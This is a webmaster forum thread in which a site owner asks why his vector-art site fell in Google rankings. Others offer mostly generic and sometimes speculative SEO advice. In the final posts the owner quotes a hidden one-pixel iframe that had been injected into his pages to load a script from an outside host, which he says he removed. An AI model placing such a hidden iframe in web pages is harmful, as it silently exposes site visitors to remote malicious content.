Hello, My website is greatvectors.com and the problem is that for almost 1,5 years it always was on the first page of google search for keyword "free vector art". Now suddently it has dropped to 90 position and i dont understand why. It is still on first page on bing and yahoo searches for that same keyword - "free vector art". Looks like nothing changed, it still has high number of good quality backlings, but google dont like my website. What could be the problem? i would really appreciate your help. Robertas.
Build some more back links . There is a probability that your competitors are good at increasing your links.
The new google algorithm rolled out recently and they are dumping sites that are thin on content. With what I saw from your site - you don't have a lot of content. You might want to add a section for articles and have each page at least 500 words.
I always meet this problem. Please don't worry, the rank will be back one week also. Maybe this keyword sunddenly has too many backlinks, so Google will get the rank down, but a few days later, the rank will back again.
But if you look at this website: allvectors.com it has less content, a lot less backlinks is younger website and has better possitions for the same keyword. I dont think that text content could help. All other competitors dont use text articles, of course i could blog a little about something on that website but do you think it would really help? Besides if only looking to backlinks i should be on third or even second place for that keyword.
I suggest you to learn more about newest google algorithm updates. Make sure your website contains are unique enough and has exactly right grammar. Make sure that all stuffs on your websites works well. Make sure that your site load faster. Also don't forget to give it more backlinks from relevant, trusted and high PR sites. Avoid backlinks from "garbage" sites. Just my 2 cent.
Hello, Sudden drop in page rank does not mean Google does not liked your website, probably the reason is back links. Regular addition of back to your web site can be most effective solution to this problem. Regards--HitechBPO
Looks like it was a virus on my webpage. It was iframe virus: <iframe heigth="1" width="1" frameborder="0" src="http://curem.net/t.php?id=455564"></iframe> Removed allready. So it could be due to this virus? How much time will it take to appear my website back in google search where it was before? Have you heard about this virus? How could he get in? Robertas
Could have been the virus i would give it a few days for Google to recall your site, they may put you back on top of the rankings if your drop was indeed due to the virus, its possible that was the case.
